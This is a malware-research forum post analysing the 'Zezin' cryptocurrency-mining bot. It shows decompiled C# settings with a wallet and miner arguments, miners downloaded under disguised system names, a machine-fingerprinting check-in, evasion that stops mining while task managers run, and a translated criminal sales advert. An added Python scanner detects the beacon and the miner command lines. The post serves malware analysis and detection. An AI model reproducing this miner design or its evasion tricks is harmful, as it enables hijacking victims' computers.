Post by Xylitol » Sun Dec 10, 2017 11:31 pm

New Monero miner called Zezin due to its pdb (and also because other signatures from AV suck), originally found by siri (I guess).
Particularity: it has a control panel: ... 3919035392 ... 0389664769

Sample attached (17 KB): VxVault - VT
Connects to a server to get the mining tool and starts mining.
Attempts to detect if one of these processes is running: taskmgr, procexp, ProcessHacker, procexp64
And if so, hides kills (lol, what did you expect) the miner till these processes disappear.
- Settings:

Code:

using System;
using System.Windows.Forms;

internal class Settings
{
    // Fields (empty string constants are shown exactly as posted)
    public const string dcr_name = "audiodg.exe";
    public const string DcrArgs = "--blake256 -o -u vlad12345123.user -p password";
    public const string DcrBlake = "";
    public static bool DcrEnable = false;
    public const string DcrUrl = "";
    public static string ExecutableDir = Environment.CurrentDirectory;
    public static string ExecutablePath = Application.ExecutablePath;
    public const string Gate = "";
    public const string Mutex = "1";
    public const int Timeout = 30;
    public const string Update = "";
    public const string xmr_name = "curl.exe";
    public const string XmrArgs = "-o -u 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o -p x -t 4 --donate-level=1";
    public const string XmrUrlX32 = "";
    public const string XmrUrlX64 = "";
}
- Main routine:

Code:

internal class Program
{
    // Methods
    private static void Main(string[] args)
    {
        // Everything (download, check-in, process watching) happens in Controller
        new Controller();
    }
}
- Various parts:

Code:

// Fetch the miners under system-looking file names (download URLs are blank as posted)
DownloadFile("", DirectoryWithDcr + "audiodg.exe");
DownloadFile(SystemInformation.Is64Bit ? "" : "", DirectoryWithXmr + "curl.exe");

// Check-in: fingerprint the machine and poll the gate for commands
public static void GetCommands()
{
    object[] args = new object[] { SystemInformation.HardwareId, SystemInformation.Is64Bit, "1", SystemInformation.GetGpuName(), SystemInformation.GetCpuName(), DateTime.Now };
    string parameter = string.Format("?machine_id={0}&x64={1}&version={2}&video_card={3}&cpu={4}&junk={5}", args);
    GetResponse("", parameter);
}
Some stats from the guy spreading the sample:

Code:

Address: 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o
Pending Balance: 0.099649891113 XMR
Personal Threshold (Editable):
0.500 XMR
Total Paid: 0.000000000000 XMR
The following stats are only for the base address and not all workers:
Last Share Submitted: 3 days ago
Hash Rate: 0.00 H/sec
Total Hashes Submitted: 487883029
epic fail profit.

Some known servers used by Zezin: Advert from 14 Oct 2017 sold by 'A310':

- CPU support (detection: x32/x64)
- GPU support (detection: Radeon/Nvidia).
- Hides the miner from most task managers.
- The bot can be updated.
- Autorun (not via the registry).
- A Tor-enabled version of the bot is available (handed out only in very exceptional cases).
- Miner control (in any case the miner will be restored as long as the bot is alive).
- Backup check-in address. (Optional)
- Random worker generation based on the machine ID. (Optional)
- Free rebuilds.
- Size: 60 KB.
- .NET 2.0.
- All updates and any support for the bot are free.
- The miner configuration can be changed directly from the panel (pool, wallet, load, etc.).

Standard miner build:
Monero (CPU) + Optional: Decred (GPU)

Language: C#

Panel features:

- Dashboard:
[*] Online, Alive, All time, Last 24 hours.
[*] Latest machines.

- Machines:
[*] Statistics for all bots.
[*] Unique machine ID, bitness, bot version, video card, CPU, first online, last online.

- Update:
[*] Ability to update the bot.

- Arguments:
[*] Ability to change the miner configuration.

Price of the kit: $125.

- CPU support (definition: x32 / x64)
- GPU support (definition: Radeon / Nvidia).
- Miner is not visible if detected (task manager, process explorer, etc.)
- Ability to update the bot (for changing the miners, new functionality).
- Hide the miner from most of the taskers.
- A Tor version of the bot is available (in rare cases).
- Autorun (not the registry).
- You can change the configuration of the miner directly from the panel (pool, purse, load, etc.).
- Random generation of workers based on the machine's id. (Optional)
- Control of the miners (in any case, the miner will be restored while the bot is alive).
- Free rebuilds.
- Size: 50 KB.
- .NET 2.0.
- All updates and any support on the bot are free.

Standard assembly of the miners:
Monero (CPU) + Optional: Decred (GPU)

- Dashboard:
[*] Online, Alive, All Time, Day.
[*] Last Machines.

- Machines:
[*] Statistics for all bots.
[*] Unique machine ID, x32/x64, Bot Version, VideoCard, CPU, First Online, Last Online.

- Update:
[*] Update the bot.

- Arguments:
[*] Ability to change the configuration of the miner.

Price set: $125.

+3 samples attached: ... 512959976/ - ... 512959977/ - ... 512959978/ -
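Added example, not part of the post: a small defender-side scanner that turns the two things the decompiled code exposes (the fixed check-in query string built by GetCommands(), and audiodg.exe / curl.exe launched with pool and wallet arguments from Settings) into detection logic run over constructed proxy and process-creation log lines. Hostnames, paths and the machine fingerprint values are placeholders; only the parameter names, file names, flags and wallet come from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters the decompiled GetCommands() sends on every check-in.
BEACON_PARAMS = {"machine_id", "x64", "version", "video_card", "cpu", "junk"}
# Wallet address and miner flags quoted from the Settings class in the post.
KNOWN_WALLET = ("43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1Cmn"
                "beLaNAUdmCqRoX6iBNLDy4RyKDHXy4o")
MINER_FLAGS = ("--donate-level=", "--blake256", " -o ", " -u ", " -p ")
# Names the sample gives the dropped miners (Settings.dcr_name / xmr_name).
DISGUISED_NAMES = ("audiodg.exe", "curl.exe")
URL_RE = re.compile(r"(?:GET|POST)\s+(\S+)")

def is_zezin_beacon(url):
    """True when the query string carries the full Zezin check-in parameter set."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return BEACON_PARAMS.issubset(qs)

def miner_cmdline_reason(cmdline):
    """Reason a process command line looks like the dropped miner, else None."""
    if KNOWN_WALLET in cmdline:
        return "known Zezin wallet in command line"
    image = (cmdline.split() or [""])[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    flags = [f.strip() for f in MINER_FLAGS if f in cmdline + " "]
    # A genuine audiodg.exe or curl.exe never takes pool/wallet/donate-level flags.
    if image in DISGUISED_NAMES and len(flags) >= 3:
        return "%s launched with miner arguments %s" % (image, ",".join(flags))
    return None

def scan(lines):
    """Return (line_no, reason) for each log line matching a Zezin indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = URL_RE.search(line)
        if m and is_zezin_beacon(m.group(1)):
            hits.append((n, "Zezin check-in beacon"))
        elif line.startswith("PROC "):
            reason = miner_cmdline_reason(line[5:])
            if reason:
                hits.append((n, reason))
    return hits

# Constructed sample lines (proxy requests, process-creation events); hosts and paths are placeholders.
SAMPLE_LOG = [
    "GET http://panel.invalid/gate?machine_id=ABCD1234&x64=True&version=1&video_card=Radeon&cpu=Intel&junk=12/10/2017 HTTP/1.1",
    "GET http://update.invalid/check?version=1&cpu=Intel HTTP/1.1",
    "PROC C:\\Users\\u\\AppData\\Roaming\\x\\curl.exe -o -u " + KNOWN_WALLET + " -p x -t 4 --donate-level=1",
    "PROC C:\\Users\\u\\AppData\\Roaming\\d\\audiodg.exe --blake256 -o -u vlad12345123.user -p password",
    "PROC C:\\Windows\\System32\\audiodg.exe 0x3a4",
    "PROC C:\\Windows\\System32\\curl.exe -o out.txt https://example.invalid/",
]
```

Running scan(SAMPLE_LOG) flags lines 1, 3 and 4 and leaves the two legitimate System32 processes alone.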